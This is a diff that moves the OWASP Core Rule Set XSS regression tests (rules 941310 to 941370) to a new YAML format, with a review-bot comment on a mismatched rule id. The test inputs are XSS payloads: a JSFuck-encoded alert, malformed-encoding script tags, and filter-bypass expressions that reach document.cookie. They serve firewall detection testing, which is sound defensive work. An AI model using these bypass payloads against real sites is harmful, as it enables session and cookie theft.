agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbe\xbe + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 8 desc: Negative for missing end tag, opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 9 desc: Negative for missing end tag, closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 10 desc: Negative using real world Russian example in utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 11 desc: Negative using real world Russian 
example in utf-8, variant stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 12 desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index ee155e7..65c280f 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941320.yaml +rule_id: 941320 tests: - - test_title: 941320-1 + - test_id: 1 desc: "XSS Attack - HTML Tag Handler" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\">" - output: - log_contains: id "941330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log: + expect_ids: [941330] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index 214a6fe..b75576c 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml 
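Review bot: The rewritten 941320.yaml declares `rule_id: 941320` but its only test still asserts `expect_ids: [941330]`, so nothing in this file verifies that rule 941320 fires; the mismatch is carried over from the old `log_contains: id "941330"` line rather than introduced here, but the format migration is the natural place to resolve it. If matching the sibling tag-handler rule is the intent, a comment such as `# this payload is expected to match 941330, not 941320` above `expect_ids` would stop it reading as a copy error; otherwise the expectation should name 941320 (or both ids). The new side also swaps the request body and adds `version: HTTP/1.0`, which changes what the test exercises; the body values look truncated in this rendering, so I cannot confirm the replacement still covers the case the old `data:` line targeted.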
@@ -1,41 +1,39 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941340.yaml +rule_id: 941340 tests: - - test_title: 941340-1 + - test_id: 1 desc: "IE XSS Filters - Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' infoo.bar=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941340" - - test_title: 941340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941340] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=XSS" - version: HTTP/1.0 - output: - log_contains: id "941340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=XSS" + version: HTTP/1.0 + output: + log: + expect_ids: [941340] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 11cd167..97a14eb 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml 
@@ -1,23 +1,21 @@ --- meta: author: "fgsch, azurit" - enabled: true - name: 941350.yaml - description: Test rule 941350 +rule_id: 941350 tests: - - test_title: 941350-1 + - test_id: 1 desc: GH issue 1514 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/xx?id=%252bADw-script%252bAD4-" - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941350" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/xx?id=%252bADw-script%252bAD4-" + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941350] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index 218cf00..b94241c 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml 
@@ -1,61 +1,59 @@ --- meta: author: "Christian Folini, azurit" - description: None - enabled: true - name: 941360.yaml +rule_id: 941360 tests: - - test_title: 941360-1 + - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" - # Payload represents "alert(1)" in JSFuck encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] + - test_id: 2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=(![]+[])[+!+[]]" - # Payload represents "a" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 
941360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] + - test_id: 3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=+!![]" - # Payload represents "1" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 4057795..ca9246a 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml 
@@ -1,177 +1,175 @@ --- meta: author: "Andrea Menin, azurit" - description: None - enabled: true - name: 941370.yaml +rule_id: 941370 tests: - - test_title: 941370-1 + - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 2 desc: "Bypass using comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 3 desc: "Bypass using JavaScript global variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 
"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%5Cx24%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml 